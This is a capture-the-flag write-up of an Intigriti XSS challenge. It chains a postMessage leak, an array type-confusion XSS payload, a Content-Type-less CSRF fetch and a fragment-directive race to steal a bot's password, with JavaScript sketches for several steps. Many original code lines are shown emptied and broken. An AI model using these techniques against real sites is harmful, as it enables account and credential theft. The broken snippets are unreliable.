Intigriti hosts monthly challenges where you have to find a difficult XSS vulnerability in some source code. This month was no different, with 0x999 making a really hard challenge at challenge-0325.intigriti.io. Just 16 people solved it in the end (not many challenges have had fewer, here's a graph I made out of curiosity). I was the first to do so, earning me the first blood 🩸!

The application was quite large compared to previous challenges and combined many small vulnerabilities, although the last step was by far the hardest. After solving it and noticing that the feature hinted at by the flag text was nowhere to be found in my exploit, I concluded that my solution was pretty unintended. That's the fun part about such large challenges.

In this writeup, I'll go through this challenge as I went through it initially, starting with looking for weird bits in the code and then trying to understand the corresponding feature. In the end, we'll combine these finds into a full attack.

Where's the flag?

Just like in regular pentests, there are "crown jewels" that we want to gain access to, which are the end goal of the vulnerabilities we find. In a CTF, this is the flag that we need to submit as proof of a solution, so where do we find it?

Searching for "flag" in the provided source code quickly tells us that there is a bot that will first log into the application with a random username, and the flag as their password (bot/bot.js):

...

const response = await ;

The challenge also explains the steps the bot takes (here):

- Open the latest version of Firefox

- Visit the Challenge page URL

- Login using the flag as the password

- Navigate to the attacker's URL

- Click at the center of the page

- Wait 60 seconds then close the browser

Apart from just getting the flag, the rules also state that the solution should work in Chromium as well as Firefox, emphasizing the latest version.

I found it weird that the flag is used as the password because normally a password is hashed, or only stored in the app database with no automated way of recovering it even with an XSS vulnerability. We should look at where this password is used in other parts of the code to see if it may be exposed somewhere to the client. This led me directly to the login handler (nextjs-app/pages/api/auth.js):

const = ;

const = ;

...

Here it does something strange: it base64-encodes the username and password joined by a : and sets the result as both a Redis key and a cookie. The cookie has the HttpOnly attribute, which prevents JavaScript from reading it via document.cookie. The browser will still store it and send it with any requests we make, but we need the value itself because it contains the flag. So we can look for any way the server may respond with something containing the cookie value, like debug information or some other HTTP vulnerability.
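To make it concrete why leaking the cookie is equivalent to leaking the flag, here is a minimal Node.js sketch of the encoding described above. The username and password values are made up for illustration, and `decodeSecret` is a hypothetical helper rather than anything from the challenge source.

```javascript
// Hypothetical credentials; the real bot uses a random username and the flag.
const username = "bot_1234";
const password = "INTIGRITI{example}";

// Encode "username:password" as base64, as the login handler is described to do.
const secretCookie = Buffer.from(`${username}:${password}`).toString("base64");

// Base64 is an encoding, not encryption: anyone holding the value can reverse it.
function decodeSecret(cookieValue) {
  const decoded = Buffer.from(cookieValue, "base64").toString("utf8");
  const separator = decoded.indexOf(":");
  return {
    username: decoded.slice(0, separator),
    password: decoded.slice(separator + 1),
  };
}

console.log(secretCookie);
console.log(decodeSecret(secretCookie));
```

Splitting on the first : only is a choice made for this sketch, so that a password containing colons survives the round trip.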

This led me to another piece of logic in nextjs-app/middleware.js, where our request's secret cookie is decoded and put into the hash fragment of a redirect:

So in theory, if we request /note/anything without the ?s= parameter, it should redirect us to another URL with the ?s=true parameter and a hash containing our secret cookie. Then we'll just read location.hash to extract it (this will be trickier than I initially thought, but we'll get there).
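The redirect behavior described here could be modeled roughly as follows. This is only a sketch under assumptions: `buildRedirect` is a hypothetical function, the example origin is made up, and the exact hash layout (the decoded cookie placed directly after `:~:`) is a guess based on the `#:~:` prefix that shows up later in this writeup.

```javascript
// Hypothetical model of the middleware: returns the redirect target,
// or null when the request would not be redirected.
function buildRedirect(requestUrl, secretCookie) {
  const url = new URL(requestUrl);
  // Only /note/* requests without an ?s= parameter are redirected.
  if (!url.pathname.startsWith("/note/") || url.searchParams.has("s")) {
    return null;
  }
  // Assumption: the cookie is base64-decoded and placed after ":~:" in the hash.
  const decoded = Buffer.from(secretCookie, "base64").toString("utf8");
  url.searchParams.set("s", "true");
  url.hash = `:~:${decoded}`;
  return url.toString();
}

const cookie = Buffer.from("bot:flag123").toString("base64");
console.log(buildRedirect("https://challenge.example/note/anything", cookie));
console.log(buildRedirect("https://challenge.example/note/anything?s=true", cookie));
```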

Leaking note IDs through postMessage

Now that we have a plan from XSS to the flag, we can start to find that XSS. A good way to do this is to look for sinks such as dangerouslySetInnerHTML in React, but I started differently. Just skimming through the code the first thing that caught my eye was the following logic:

;

const ;

postMessages are always interesting, especially when the target origin is set to "*" as it is here for outgoing messages, and there are no origin checks for incoming messages. This means anyone holding a reference to the window (such as us, as the opener) may send it messages. These are handled by the handleMessage() function.

If the data we send has a {type: "submitPassword"}, the .password property will be passed to validatepassword(). This searches through the Local Storage notes until it finds one whose password matches the one given by us. If it finds one, the .id will be sent to the opener. If we have opened the target page from our domain, we can receive the ID.

Okay, so notes can have a password. In the application these are named "Protected Notes", but you can also make a regular note without a password. How would the code handle that? After creating two sample notes in the application, the Local Storage looks like this:

Both types of notes are stored in the same place, and unprotected notes have a password field of "". We can match that in our postMessage to receive the ID of an unprotected note!

const = ;

w = ;
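A rough sketch of this idea, under stated assumptions: the storage shape (an array of objects with `id` and `password`), the helper `findNoteIdByPassword`, and the 2 second delay are all illustrative and not taken from the challenge source. The browser-only part is defined but not called, so the lookup logic can be tried on its own.

```javascript
// Assumed storage shape: a list of notes, each with an id and a password.
const storedNotes = [
  { id: "note-protected", password: "hunter2" },
  { id: "note-plain", password: "" },
];

// Hypothetical stand-in for the page's lookup: first note whose password matches.
function findNoteIdByPassword(notes, password) {
  const match = notes.find((note) => note.password === password);
  return match ? match.id : null;
}

// Attacker-side sketch (browser only, not called here): open the target,
// send an empty password, and wait for whatever the page posts back.
function leakUnprotectedNoteId(targetUrl) {
  return new Promise((resolve) => {
    window.addEventListener("message", (event) => resolve(event.data), { once: true });
    const w = window.open(targetUrl);
    // Assumption: a fixed delay is enough for the target to register its listener.
    setTimeout(() => w.postMessage({ type: "submitPassword", password: "" }, "*"), 2000);
  });
}

console.log(findNoteIdByPassword(storedNotes, "")); // note-plain
```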

Stored XSS in note

Another peculiar check is the following (nextjs-app/pages/api/post.js):

When creating a note, it tries to make sure the content does not include < or > characters. The use of .includes() here triggered my Type Confusion senses because in JavaScript, an Array has such a method as well. It will then match against whole items in the array and is a common way to bypass checks like these. Since the body is made from JSON, we can use "content": ["<img src onerror=alert()>"] to turn it into an array. The check will look for a literal "<" item in the array, which it doesn't contain so it passes the check.

Actually, this check doesn't even execute because the typeof content === 'string' condition bypasses it with our array already!
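The behavior is easy to verify in isolation. The function below is an assumed reconstruction of the check based on the description above (a `typeof` guard combined with `.includes()`), not a copy of the challenge code.

```javascript
// Assumed shape of the server-side check: reject strings containing < or >.
function isContentRejected(content) {
  return typeof content === "string" && (content.includes("<") || content.includes(">"));
}

const asString = "<img src onerror=alert()>";
const asArray = ["<img src onerror=alert()>"];

console.log(isContentRejected(asString)); // true: a plain string is caught
console.log(isContentRejected(asArray)); // false: the typeof guard skips arrays
console.log(asArray.includes("<")); // false: Array#includes compares whole items
console.log(String(asArray) === asString); // true: stringifying restores the payload
```

Either condition alone would let the array through, which is why wrapping the payload in a JSON array is enough.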

After saving, it gets displayed upon visiting the note. For this, it uses dangerouslySetInnerHTML which as the name suggests, is dangerous. It's the reason why the < sanitization is there, to prevent you from opening HTML tags.



With our array put into here, we can still inject HTML because the stringified version of an array in JavaScript is just its items joined by a ,. Let's try it:

It saves successfully, and upon opening the note, we see our XSS trigger!

While it may look like we've just solved the "XSS Challenge", remember that our goal is to get the flag from the bot. This means we still need to implement exfiltrating the flag (password) as well as find a way to trigger this on the bot. Notes are per account and so at this point, it is a Self XSS because the attacker can only trigger it on their own account.

CSRF without Content-Type



One more suspicious configuration involves the cookies. If we look at the cookie's attributes, we notice that SameSite is explicitly set to None:

This means cookies may be sent in all kinds of requests, GET/POST, from another site and even in the background. If there aren't any other CSRF protections in place, the forms may be vulnerable and we can make a logged-in user create posts on our behalf.

Looking at the handler for creating notes from earlier, we can assess if it would be vulnerable to CSRF as well.

...

case :

Firstly, the secret_cookie must be set of course, but this is easy due to the SameSite=None attribute. In a cross-origin request without CORS headers, you can only set the content type to three very strict values: application/x-www-form-urlencoded (default), multipart/form-data, and text/plain. Only in these cases will it be seen as a "Simple Request".

The Content-Type header is checked. If it exists and doesn't start with application/json, the request is denied. If it exists. There just so happens to be a recent technique showing how it's possible to omit this header from a fetch() request:

"Luke Jahnke - Cross-Site POST Requests Without a Content-Type Header"

All you need to do is put the body of your request into a new Blob([]). From here, our application will continue with parsing the body as JSON. With this we can create the XSS note on the bot's account:

const = ;

;
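To illustrate why a missing header slips through, here is a sketch with an assumed reconstruction of the Content-Type check, next to a browser-side request built the way the technique describes. `isContentTypeAccepted` and `createNoteCrossSite` are hypothetical names, and the endpoint and note fields are left as parameters because they depend on the application.

```javascript
// Assumed shape of the handler's check: only reject when a header is present
// and it does not start with application/json.
function isContentTypeAccepted(contentType) {
  if (contentType && !contentType.startsWith("application/json")) {
    return false;
  }
  return true;
}

// Browser-side sketch (not called here): a Blob with no type gives the request
// no Content-Type header, while credentials: "include" attaches the cookie.
function createNoteCrossSite(endpoint, note) {
  return fetch(endpoint, {
    method: "POST",
    mode: "no-cors",
    credentials: "include",
    body: new Blob([JSON.stringify(note)]),
  });
}

console.log(isContentTypeAccepted("text/plain;charset=UTF-8")); // false
console.log(isContentTypeAccepted("application/json")); // true
console.log(isContentTypeAccepted(undefined)); // true: no header, no rejection
```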

One caveat is that for cross-site background requests like this fetch(), browsers by default don't allow even SameSite=None cookies to be sent. This is a relatively recent change to enhance privacy on the web. Luckily for us, there are some exceptions to this rule, ones that are very easy to trigger (source):

- Chromium: window.open() the target site and receive an interaction inside the new window

- Firefox: window.open() the target site (no interaction required)



Both of these whitelist your domain to send background requests to the target with cookies for 30 days. Performing this on ourselves, we can see that it successfully created the post from an attacker's site:

Combining Bugs

Looking back at what we found, we have a way to:

- Create an arbitrary note through CSRF

- Leak a note ID with postMessage()

- XSS upon viewing a note

Sounds like we have all we need to get the flag, so let's get combining:



This works! And we can run arbitrary JavaScript in the origin of the challenge domain. We should now just look at location.hash and...

It's... empty? If we change the hash to #anything we can read it, but changing it back to #:~:anything causes it to get stripped from these variables! In addition to that, after loading the page it seems to be removed from the address bar due to NextJS.

What's special about this hash fragment syntax is that the :~: prefix makes it a Fragment Directive, most commonly used for Scroll To Text Fragment behavior. For some reason, browsers want to hide this, but we need it to leak the flag.
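As a small illustration of the syntax, the hypothetical helper below splits a raw hash at the first `:~:` delimiter into the regular fragment and the directive. It only models the string format; it is a sketch and not how any browser implements the stripping.

```javascript
// Hypothetical helper: split a raw hash into the regular fragment and the
// fragment directive, using the first ":~:" as the delimiter.
function splitFragmentDirective(hash) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  const index = raw.indexOf(":~:");
  if (index === -1) {
    return { fragment: raw, directive: null };
  }
  return { fragment: raw.slice(0, index), directive: raw.slice(index + 3) };
}

console.log(splitFragmentDirective("#anything"));
console.log(splitFragmentDirective("#:~:anything"));
console.log(splitFragmentDirective("#section:~:text=hello"));
```

In this model, the `fragment` part is what scripts still get to see, which matches the empty location.hash observed above when the whole hash is a directive.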

Leaking the Fragment Directive



This turns out to be the hardest part of the challenge, where a lot of solutions differ. Firstly, Google documents one workaround:

new.

This looks great, on Chromium this lets you get the fragment directive right away. But on Firefox, it still strips it like any other URL (latest version is important because of a recent "fix"):

If we want to obtain it, we should think about alternative methods on Firefox to read URLs. I tried a lot of different things like document.URL, relative URLs with <a href>, or the History API, but everything still seems to hide this fragment directive.



Eventually, I looked at the onhashchange event that triggers when the hash fragment is altered, like with location.hash = "CHANGED":

To my surprise, I saw the secret #:~: part in the .oldURL property of this event! All we need to do is register this event handler, then change the hash, and from the generated event, extract this property we found.

;

location. = ;
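The steps just described (register the handler, change the hash, read .oldURL) can be sketched as a small function. `leakOldUrlHash` is a hypothetical name, and taking the window as a parameter is a choice made here so the logic can also be exercised against a stand-in object outside a browser.

```javascript
// Register a one-time hashchange handler, then trigger it by changing the hash.
// On Firefox, event.oldURL was observed to still contain the "#:~:" part.
function leakOldUrlHash(win, onLeak) {
  win.addEventListener(
    "hashchange",
    (event) => {
      // Parsing a plain string with URL keeps the whole hash intact.
      onLeak(new URL(event.oldURL).hash);
    },
    { once: true }
  );
  win.location.hash = "CHANGED";
}
```

In the context of the XSS payload, this would be called as `leakOldUrlHash(window, (hash) => alert(hash))`.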

This is a way to leak the fragment directive on Firefox, but NextJS still removes it during a history.replaceState() call right when the page loads. If we open a new window that redirects to the URL with the password in the hash using /note/anything, we have a small Race Condition where we have access to the page's origin and NextJS hasn't been loaded yet. During this time, we can spam eval()s that try to leak the hash before it is removed.

const = // 1. Open URL redirecting to `#:~:...`



All that's left to do now is to send the flag to our server instead of alert()ing it. Combine that with our previous XSS script and we get the following final solution, which we send to the bot:

https://gist.github.com/JorianWoltjer/1481c1f57f0a56c868da58752675df13

A few seconds after submitting to the bot, the flag appears in our callback endpoint!

INTIGRITI{s3rv1ce_w0rk3rs_4re_p0w3rful}. Check out 0x999's writeup to understand what these Service Workers are all about ;)

Conclusion

This was a nice challenge about chaining simpler vulnerabilities, and then an unexpected slam dunk of a last step. The weirdness around fragment directives was very interesting to me, perfect for a CTF challenge! I hope you learned something new, be it technical or approach-wise. The moral of the story is to find as many small bugs as possible that you can later chain together for a high impact.